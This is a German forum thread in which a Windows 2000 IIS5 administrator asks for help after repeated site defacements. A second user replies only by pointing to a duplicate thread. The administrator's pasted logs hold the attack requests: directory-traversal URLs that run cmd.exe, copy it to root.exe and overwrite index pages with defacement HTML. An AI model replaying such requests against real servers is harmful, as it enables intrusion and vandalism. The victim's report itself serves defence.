IIS 5 Hack

[Dr_Devil]

Hi,

Ich ahbe ein grosses Problem !

Jemand schafft es immer wieder eine Datei Namens "root.exe" auf mein IIS5 System zukopieren !

Anhand LogFiles sehe Ich folgendes was anscheinend über ein URL Aufruf geschieht !

Start LogFile:
----------------------
80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 -
80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 -
80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<b r^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22ce nter%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^< /font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+ color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center %22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.co m.cn^</html^>>.././index.asp 502 -

Es geht noch weiter so !
Ergebnis: Es werden vier Dateien erstellt:
index.html
index.asp
default.html
default.asp

Meine originalen werden natürlich überschrieben

Bitte dringends um einen Tip oder Rat !

System:
-----------
Win2000 Svr + iis5
SP1
Patch wegen ISAPI Fehler im IIS5, seit 2.5.2001

Danke !

[Lemmi]

Hier gehts weiter !!


http://www.windows2000helpline.de/cg...&f=13&t=003209


Keie doppelpostings !!!!